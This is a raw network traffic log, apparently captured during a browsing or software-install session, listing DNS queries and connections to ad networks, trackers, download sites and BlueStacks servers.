US 8.8.8.8:53 pubads.g.doubleclick.net udp
US 8.8.8.8:53 m.media-amazon.com udp
GB 142.250.200.2:443 pubads.g.doubleclick.net tcp
BE 23.14.90.104:443 m.media-amazon.com tcp
US 8.8.8.8:53 ssum-sec.casalemedia.com udp
DE 51.89.9.252:443 onetag-sys.com tcp
US 8.8.8.8:53 player.aniview.com udp
US 8.8.8.8:53 ts.amazon-adsystem.com udp
US 8.8.8.8:53 csi.gstatic.com udp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
US 67.202.105.21:443 ssc-cms.33across.com tcp
US 216.239.32.3:443 csi.gstatic.com tcp
US 216.239.32.3:443 csi.gstatic.com tcp
US 8.8.8.8:53 secure.adnxs.com udp
NL 81.17.55.108:443 ssbsync.smartadserver.com tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
GB 54.192.137.6:443 s2.paa-reporting-advertising.amazon tcp
NL 178.250.1.9:443 dis.criteo.com tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
US 8.8.8.8:53 sync.1rx.io udp
US 8.8.8.8:53 match.prod.bidr.io udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 15.197.193.217:443 match.adsrvr.org tcp
US 8.8.8.8:53 cs-server-s2s.yellowblue.io udp
IE 54.171.23.218:443 jadserve.postrelease.com tcp
US 8.8.8.8:53 bttrack.com udp
US 8.8.8.8:53 id.rlcdn.com udp
US 8.8.8.8:53 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev udp
US 192.132.33.69:443 bttrack.com tcp
US 54.172.224.53:443 sync.srv.stackadapt.com tcp
US 54.156.110.223:443 cs-server-s2s.yellowblue.io tcp
IE 52.213.253.239:443 match.prod.bidr.io tcp
NL 69.173.156.149:443 token.rubiconproject.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 8.8.8.8:53 pixel.rubiconproject.com udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 35.244.174.68:443 id.rlcdn.com udp
NL 35.214.149.91:443 x.bidswitch.net tcp
NL 69.173.156.149:443 pixel.rubiconproject.com tcp
GB 142.250.178.2:443 cm.g.doubleclick.net udp
GB 108.156.39.62:443 tungsten-service.prod.eu.adsqtungsten.a9.amazon.dev tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
US 54.172.224.53:443 sync.srv.stackadapt.com tcp
US 54.156.110.223:443 cs-server-s2s.yellowblue.io tcp
US 192.132.33.69:443 bttrack.com tcp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 86.218.245.18.in-addr.arpa udp
US 8.8.8.8:53 3.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 108.55.17.81.in-addr.arpa udp
US 8.8.8.8:53 6.137.192.54.in-addr.arpa udp
US 8.8.8.8:53 62.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 rtb-csync.smartadserver.com udp
US 8.8.8.8:53 c1.adform.net udp
DK 37.157.3.26:443 c1.adform.net tcp
NL 89.149.193.104:443 rtb-csync.smartadserver.com tcp
US 8.8.8.8:53 match.sharethrough.com udp
DE 3.127.95.65:443 match.sharethrough.com tcp
US 8.8.8.8:53 ox-rtb-europe-west2.openx.net udp
IE 52.95.115.196:443 aax-eu.amazon-adsystem.com tcp
US 8.8.8.8:53 connatix-d.openx.net udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net tcp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
US 34.98.64.218:443 connatix-d.openx.net tcp
US 34.98.64.218:443 connatix-d.openx.net tcp
US 34.98.64.218:443 connatix-d.openx.net tcp
US 8.8.8.8:53 69.33.132.192.in-addr.arpa udp
US 8.8.8.8:53 53.224.172.54.in-addr.arpa udp
US 8.8.8.8:53 223.110.156.54.in-addr.arpa udp
US 8.8.8.8:53 26.3.157.37.in-addr.arpa udp
US 8.8.8.8:53 65.95.127.3.in-addr.arpa udp
US 8.8.8.8:53 196.115.95.52.in-addr.arpa udp
US 8.8.8.8:53 98.143.102.34.in-addr.arpa udp
US 8.8.8.8:53 218.64.98.34.in-addr.arpa udp
US 216.239.32.3:443 csi.gstatic.com udp
US 8.8.8.8:53 assets.connatix.com udp
US 34.98.64.218:443 connatix-d.openx.net udp
DE 141.95.98.64:443 diagnostics.id5-sync.com tcp
NL 185.89.210.20:443 secure.adnxs.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
GB 18.245.218.86:443 ts.amazon-adsystem.com tcp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.19.252.134:443 aefd.nelreports.net udp
US 8.8.8.8:53 134.252.19.2.in-addr.arpa udp
NL 185.89.210.20:443 secure.adnxs.com tcp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
US 8.8.8.8:53 apien.ldmnq.com udp
GB 13.224.132.104:443 apien.ldmnq.com tcp
US 8.8.8.8:53 104.132.224.13.in-addr.arpa udp
US 8.8.8.8:53 ad.360yield.com udp
US 178.128.135.204:443 brightcombid.marphezis.com tcp
US 34.120.63.153:443 prebid.media.net udp
IE 52.211.208.99:443 ad.360yield.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
GB 216.58.213.14:80 www.google-analytics.com tcp
US 8.8.8.8:53 99.208.211.52.in-addr.arpa udp
NL 185.89.210.20:443 secure.adnxs.com tcp
NL 185.89.210.20:443 secure.adnxs.com tcp
US 8.8.8.8:53 ox-rtb-europe-west2.openx.net udp
US 34.102.143.98:443 ox-rtb-europe-west2.openx.net udp
GB 216.58.212.194:443 googleads.g.doubleclick.net udp
NL 185.89.210.20:443 secure.adnxs.com tcp
US 8.8.8.8:53 s2.paa-reporting-advertising.amazon udp
DE 46.4.139.58:443 shb.richaudience.com tcp
US 8.8.8.8:53 ad.360yield.com udp
US 8.8.8.8:53 brightcombid.marphezis.com udp
US 8.8.8.8:53 ap.lijit.com udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
US 178.128.135.204:443 brightcombid.marphezis.com tcp
IE 52.214.18.255:443 ad.360yield.com tcp
IE 63.33.54.152:443 ap.lijit.com tcp
US 34.120.63.153:443 prebid.media.net udp
FR 185.255.84.150:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 255.18.214.52.in-addr.arpa udp
US 8.8.8.8:53 152.54.33.63.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 csm.nl3.eu.criteo.net udp
NL 23.62.61.194:443 th.bing.com tcp
US 216.239.32.36:443 region1.analytics.google.com udp
GB 142.250.200.3:443 www.google.co.uk udp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 13.107.21.237:443 bat.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
US 104.18.33.89:443 www2.bing.com tcp
US 104.18.33.89:443 www2.bing.com tcp
US 8.8.8.8:53 89.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 smartgaga.me udp
US 172.67.196.144:443 smartgaga.me tcp
US 172.67.196.144:443 smartgaga.me tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 144.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.smartgaga.me udp
US 8.8.8.8:53 g.ezoic.net udp
FR 35.181.89.222:443 g.ezoic.net tcp
US 8.8.8.8:53 222.89.181.35.in-addr.arpa udp
GB 216.58.212.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 aefd.nelreports.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 2.19.252.134:443 aefd.nelreports.net udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
GB 172.217.16.225:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ams3-ib.adnxs.com udp
US 8.8.8.8:53 adsdk.microsoft.com udp
US 8.8.8.8:53 cdn.adnxs.com udp
US 13.107.246.64:443 adsdk.microsoft.com tcp
NL 185.89.211.116:443 ams3-ib.adnxs.com tcp
GB 2.21.188.221:443 cdn.adnxs.com tcp
US 8.8.8.8:53 116.211.89.185.in-addr.arpa udp
US 8.8.8.8:53 221.188.21.2.in-addr.arpa udp
US 216.239.34.36:443 region1.google-analytics.com udp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.16.238:443 syndicatedsearch.goog tcp
GB 142.250.178.2:443 cm.g.doubleclick.net udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.200.22:443 i.ytimg.com tcp
GB 172.217.16.238:443 syndicatedsearch.goog udp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 22.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 cse.google.com udp
GB 142.250.179.238:443 cse.google.com tcp
GB 142.250.179.238:443 cse.google.com udp
US 8.8.8.8:53 clients1.google.com udp
GB 142.250.187.238:443 clients1.google.com tcp
US 104.18.10.207:443 maxcdn.bootstrapcdn.com tcp
NL 185.89.211.116:443 ams3-ib.adnxs.com tcp
US 8.8.8.8:53 ia902903.us.archive.org udp
US 207.241.233.43:443 ia902903.us.archive.org tcp
US 8.8.8.8:53 43.233.241.207.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 142.250.178.14:443 google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.163:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 163.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
NL 23.62.61.97:443 r.bing.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 104.18.33.89:443 www2.bing.com tcp
US 104.18.33.89:443 www2.bing.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 filecr.com udp
US 172.67.190.231:443 filecr.com tcp
US 172.67.190.231:443 filecr.com tcp
US 8.8.8.8:53 231.190.67.172.in-addr.arpa udp
US 8.8.8.8:53 webcrx.io udp
US 172.67.148.101:443 webcrx.io tcp
US 8.8.8.8:53 zintrack.com udp
US 104.21.94.97:443 zintrack.com tcp
US 104.18.33.89:443 www2.bing.com tcp
US 104.18.33.89:443 www2.bing.com tcp
US 104.21.94.97:443 zintrack.com tcp
US 8.8.8.8:53 97.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 101.148.67.172.in-addr.arpa udp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.19.252.134:443 aefd.nelreports.net udp
US 8.8.8.8:53 stackoverflow.com udp
US 172.64.155.249:443 stackoverflow.com tcp
US 172.64.155.249:443 stackoverflow.com tcp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 cdn.sstatic.net udp
US 172.64.147.34:443 cdn.sstatic.net tcp
US 172.64.147.34:443 cdn.sstatic.net tcp
US 172.64.147.34:443 cdn.sstatic.net tcp
US 172.64.147.34:443 cdn.sstatic.net tcp
US 172.64.147.34:443 cdn.sstatic.net tcp
GB 172.217.169.74:443 ajax.googleapis.com udp
US 8.8.8.8:53 249.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 34.147.64.172.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 8.8.8.8:53 graph.facebook.com udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 i.sstatic.net udp
GB 163.70.151.23:443 graph.facebook.com tcp
US 104.18.41.33:443 i.sstatic.net tcp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 pub.doubleverify.com udp
US 8.8.8.8:53 scontent-lhr6-2.xx.fbcdn.net udp
US 8.8.8.8:53 accounts.google.com udp
GB 163.70.151.21:443 scontent-lhr6-2.xx.fbcdn.net tcp
US 104.18.166.224:443 pub.doubleverify.com tcp
IE 209.85.203.84:443 accounts.google.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 104.18.166.224:443 pub.doubleverify.com tcp
IE 209.85.203.84:443 accounts.google.com udp
US 8.8.8.8:53 23.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 33.41.18.104.in-addr.arpa udp
US 8.8.8.8:53 e4b365b2ef49c4c77038f5089cd8dbff.safeframe.googlesyndication.com udp
US 8.8.8.8:53 stackoverflow-privacy.my.onetrust.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
GB 172.217.169.65:443 e4b365b2ef49c4c77038f5089cd8dbff.safeframe.googlesyndication.com tcp
US 104.18.32.137:443 stackoverflow-privacy.my.onetrust.com tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 clc.stackoverflow.com udp
US 8.8.8.8:53 support.bluestacks.com udp
US 104.16.53.111:443 support.bluestacks.com tcp
US 104.16.53.111:443 support.bluestacks.com tcp
US 8.8.8.8:53 static.zdassets.com udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 151.101.193.229:443 cdn.jsdelivr.net udp
US 172.67.142.245:443 use.fontawesome.com tcp
US 104.18.72.113:443 static.zdassets.com tcp
US 172.67.142.245:443 use.fontawesome.com tcp
US 8.8.8.8:53 cloud.bluestacks.com udp
US 104.16.53.111:443 support.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 111.53.16.104.in-addr.arpa udp
US 8.8.8.8:53 245.142.67.172.in-addr.arpa udp
US 8.8.8.8:53 181.86.160.34.in-addr.arpa udp
BE 64.233.167.156:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 widget.kommunicate.io udp
US 8.8.8.8:53 bluestacks-zendesk-com.disqus.com udp
US 8.8.8.8:53 ekr.zdassets.com udp
US 199.232.192.134:443 bluestacks-zendesk-com.disqus.com tcp
GB 108.156.39.90:443 widget.kommunicate.io tcp
US 104.18.72.113:443 ekr.zdassets.com tcp
US 8.8.8.8:53 c.disquscdn.com udp
US 8.8.8.8:53 disqus.com udp
US 151.101.192.134:443 disqus.com tcp
GB 13.224.132.33:443 c.disquscdn.com tcp
US 104.16.53.111:443 support.bluestacks.com tcp
US 8.8.8.8:53 cdn.kommunicate.io udp
GB 108.138.233.47:443 cdn.kommunicate.io tcp
US 8.8.8.8:53 156.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 90.39.156.108.in-addr.arpa udp
US 8.8.8.8:53 134.192.101.151.in-addr.arpa udp
US 8.8.8.8:53 33.132.224.13.in-addr.arpa udp
GB 108.156.39.90:443 widget.kommunicate.io tcp
US 8.8.8.8:53 api.kommunicate.io udp
US 23.21.108.211:443 api.kommunicate.io tcp
US 8.8.8.8:53 chat.kommunicate.io udp
US 8.8.8.8:53 47.233.138.108.in-addr.arpa udp
US 3.230.9.140:443 chat.kommunicate.io tcp
US 8.8.8.8:53 211.108.21.23.in-addr.arpa udp
US 8.8.8.8:53 140.9.230.3.in-addr.arpa udp
US 8.8.8.8:53 ak-build.bluestacks.com udp
US 2.20.12.70:443 ak-build.bluestacks.com tcp
US 2.20.12.70:443 ak-build.bluestacks.com tcp
SE 192.229.221.95:80 cacerts.rapidssl.com tcp
US 8.8.8.8:53 cloud.bluestacks.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 cdn-bgp.bluestacks.com udp
US 2.20.12.69:443 cdn-bgp.bluestacks.com tcp
US 8.8.8.8:53 69.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 ak-build.bluestacks.com udp
US 2.20.12.92:443 ak-build.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
N/A 127.0.0.1:61561 tcp
N/A 127.0.0.1:61568 tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
N/A 127.0.0.1:57685 tcp
US 8.8.8.8:53 anygame.net udp
US 172.67.216.225:443 anygame.net tcp
US 172.67.216.225:443 anygame.net tcp
US 8.8.8.8:53 225.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.187.238:443 www.youtube.com udp
US 8.8.8.8:53 csi.gstatic.com udp
ES 172.217.17.3:443 csi.gstatic.com udp
US 8.8.8.8:53 3.17.217.172.in-addr.arpa udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 wallet.now.gg udp
US 34.96.124.47:443 wallet.now.gg tcp
US 8.8.8.8:53 47.124.96.34.in-addr.arpa udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 cloud.bluestacks.com udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 google.com udp
GB 142.250.178.14:443 google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 1.eu.dl.wireshark.org udp
FI 65.21.187.17:443 1.eu.dl.wireshark.org tcp
FI 65.21.187.17:443 1.eu.dl.wireshark.org tcp
US 8.8.8.8:53 17.187.21.65.in-addr.arpa udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 34.96.124.47:443 wallet.now.gg tcp
US 34.96.124.47:443 wallet.now.gg tcp
US 8.8.8.8:53 fcmregistrations.googleapis.com udp
GB 216.58.201.106:443 fcmregistrations.googleapis.com tcp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 34.160.86.181:443 cloud.bluestacks.com tcp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
BE 173.194.76.188:5228 mtalk.google.com tcp
US 8.8.8.8:53 188.76.194.173.in-addr.arpa udp
US 8.8.4.4:443 dns.google udp
US 34.96.124.47:443 wallet.now.gg udp
ES 172.217.17.3:443 csi.gstatic.com udp
US 8.8.8.8:53 storage.googleapis.com udp
GB 142.250.187.251:443 storage.googleapis.com tcp
US 8.8.8.8:53 251.187.250.142.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 filehippo.com udp
US 35.201.106.130:443 filehippo.com tcp
US 35.201.106.130:443 filehippo.com tcp
US 8.8.8.8:53 sc.filehippo.net udp
US 8.8.8.8:53 cache-05.filehippo.net udp
US 8.8.8.8:53 sdk.privacy-center.org udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 151.101.1.91:443 cache-05.filehippo.net tcp
US 8.8.8.8:53 c.aaxads.com udp
GB 13.224.222.64:443 sdk.privacy-center.org tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 23.219.230.135:443 sc.filehippo.net tcp
US 8.8.8.8:53 cdn.firstimpression.io udp
US 8.8.8.8:53 cdn-magiclinks.trackonomics.net udp
US 23.219.230.135:443 sc.filehippo.net tcp
US 8.8.8.8:53 ecdn.firstimpression.io udp
US 8.8.8.8:53 widgets.outbrain.com udp
GB 2.21.189.145:443 widgets.outbrain.com tcp
US 8.8.8.8:53 l3.aaxads.com udp
US 151.101.1.91:443 cache-05.filehippo.net udp
US 8.8.8.8:53 www.aaxdetect.com udp
US 8.8.8.8:53 www.googletagservices.com udp
GB 99.86.114.24:443 cdn-magiclinks.trackonomics.net tcp
US 23.219.237.124:443 l3.aaxads.com tcp
US 172.67.4.231:443 c.aaxads.com tcp
GB 18.244.179.8:443 ecdn.firstimpression.io tcp
GB 18.244.179.8:443 ecdn.firstimpression.io tcp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 push-sdk.com udp
US 8.8.8.8:53 contributor.google.com udp
GB 142.250.187.238:443 contributor.google.com tcp
DE 178.63.248.57:443 push-sdk.com tcp
US 23.219.237.124:443 l3.aaxads.com tcp
US 103.224.212.213:443 www.aaxdetect.com tcp
US 8.8.8.8:53 config.aps.amazon-adsystem.com udp
US 8.8.8.8:53 btloader.com udp
GB 52.84.90.106:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 cdn.id5-sync.com udp
US 104.22.75.216:443 btloader.com tcp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 104.22.53.86:443 cdn.id5-sync.com tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 tcheck.outbrainimg.com udp
US 8.8.8.8:53 widget-pixels.outbrain.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 2.21.190.8:443 tcheck.outbrainimg.com tcp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
BE 64.233.167.156:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 api.privacy-center.org udp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 uidsync.net udp
US 8.8.8.8:53 log.outbrainimg.com udp
US 8.8.8.8:53 130.106.201.35.in-addr.arpa udp
US 8.8.8.8:53 145.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 24.114.86.99.in-addr.arpa udp
US 8.8.8.8:53 231.4.67.172.in-addr.arpa udp
US 8.8.8.8:53 8.179.244.18.in-addr.arpa udp
US 8.8.8.8:53 2.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 124.237.219.23.in-addr.arpa udp
US 8.8.8.8:53 57.248.63.178.in-addr.arpa udp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 213.212.224.103.in-addr.arpa udp
US 8.8.8.8:53 216.75.22.104.in-addr.arpa udp
US 8.8.8.8:53 8.190.21.2.in-addr.arpa udp
GB 108.138.233.67:443 api.privacy-center.org tcp
US 172.67.69.19:443 ad-delivery.net tcp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 www.google.co.uk udp
GB 142.250.187.196:443 www.google.com udp
US 50.31.142.159:443 log.outbrainimg.com tcp
GB 142.250.200.3:443 www.google.co.uk udp
US 151.101.1.91:443 cache-05.filehippo.net udp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 mv.outbrain.com udp
US 151.101.190.132:443 mv.outbrain.com tcp
US 8.8.8.8:53 mcdp-chidc2.outbrain.com udp
US 64.74.236.191:443 mcdp-chidc2.outbrain.com tcp
US 64.74.236.191:443 mcdp-chidc2.outbrain.com tcp
US 8.8.8.8:53 67.233.138.108.in-addr.arpa udp
US 8.8.8.8:53 68.33.90.157.in-addr.arpa udp
US 8.8.8.8:53 159.142.31.50.in-addr.arpa udp
US 8.8.8.8:53 132.190.101.151.in-addr.arpa udp
US 8.8.8.8:53 191.236.74.64.in-addr.arpa udp
GB 18.244.140.75:443 rock.defybrick.com tcp
US 8.8.8.8:53 flint.defybrick.com udp
US 54.83.110.109:443 flint.defybrick.com tcp
US 8.8.8.8:53 80acfb9f6ec5b0fa5c32b2c7e3290a7d.safeframe.googlesyndication.com udp
US 8.8.8.8:53 ad.360yield.com udp
US 8.8.8.8:53 tlx.3lift.com udp
US 8.8.8.8:53 hb.yellowblue.io udp
US 8.8.8.8:53 htlb.casalemedia.com udp
US 8.8.8.8:53 cdn-ima.33across.com udp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
GB 172.217.169.65:443 80acfb9f6ec5b0fa5c32b2c7e3290a7d.safeframe.googlesyndication.com tcp
NL 185.89.210.46:443 ams3-ib.adnxs.com tcp
IE 18.200.130.123:443 ad.360yield.com tcp
US 104.18.35.167:443 cdn-ima.33across.com tcp
US 172.64.151.101:443 htlb.casalemedia.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
DE 18.157.230.4:443 tlx.3lift.com tcp
DE 162.19.138.82:443 id5-sync.com tcp
NL 69.173.156.139:443 fastlane.rubiconproject.com tcp
DE 162.19.138.118:443 id5-sync.com tcp
GB 108.138.217.66:443 hb.yellowblue.io tcp
GB 18.245.143.58:443 tags.crwdcntrl.net tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
GB 142.250.187.196:443 www.google.com udp
IE 52.50.240.62:443 bcp.crwdcntrl.net tcp
US 8.8.8.8:53 75.140.244.18.in-addr.arpa udp
US 8.8.8.8:53 109.110.83.54.in-addr.arpa udp
US 8.8.8.8:53 46.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 123.130.200.18.in-addr.arpa udp
US 8.8.8.8:53 101.151.64.172.in-addr.arpa udp
US 8.8.8.8:53 66.217.138.108.in-addr.arpa udp
US 8.8.8.8:53 139.156.173.69.in-addr.arpa udp
US 8.8.8.8:53 4.230.157.18.in-addr.arpa udp
US 8.8.8.8:53 82.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 118.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 62.240.50.52.in-addr.arpa udp
US 8.8.8.8:53 cdn.ampproject.org udp
GB 142.250.187.225:443 cdn.ampproject.org tcp
GB 142.250.187.225:443 cdn.ampproject.org tcp
GB 142.250.187.225:443 cdn.ampproject.org tcp
GB 142.250.187.225:443 cdn.ampproject.org tcp
GB 142.250.187.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 35.201.106.130:443 filehippo.com udp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
GB 18.244.183.122:443 d2fl4wg0zuweex.cloudfront.net tcp
US 8.8.8.8:53 122.183.244.18.in-addr.arpa udp
DE 178.63.248.57:443 uidsync.net tcp
US 8.8.8.8:53 9e979812321267924c5ada7c2c3b7267.safeframe.googlesyndication.com udp
DE 157.90.33.68:443 uidsync.net tcp
DE 157.90.33.68:443 uidsync.net tcp
US 8.8.8.8:53 cd.connatix.com udp
US 172.64.146.152:443 cd.connatix.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 152.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 cds.connatix.com udp
US 50.31.142.159:443 log.outbrainimg.com tcp
US 8.8.8.8:53 sync.outbrain.com udp
US 50.31.142.159:443 log.outbrainimg.com tcp
US 50.31.142.159:443 log.outbrainimg.com tcp
US 64.74.236.31:443 sync.outbrain.com tcp
US 8.8.8.8:53 capi.connatix.com udp
US 8.8.8.8:53 ins.connatix.com udp
US 8.8.8.8:53 vid.connatix.com udp
US 8.8.8.8:53 lit.connatix.com udp
US 8.8.8.8:53 imasdk.googleapis.com udp
US 8.8.8.8:53 img.connatix.com udp
GB 142.250.200.10:443 imasdk.googleapis.com udp
US 8.8.8.8:53 31.236.74.64.in-addr.arpa udp
US 8.8.8.8:53 s0.2mdn.net udp
GB 216.58.204.70:443 s0.2mdn.net udp
US 8.8.8.8:53 pubads.g.doubleclick.net udp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
ES 172.217.17.3:443 csi.gstatic.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 eb2.3lift.com udp
US 8.8.8.8:53 eus.rubiconproject.com udp
US 8.8.8.8:53 acdn.adnxs.com udp
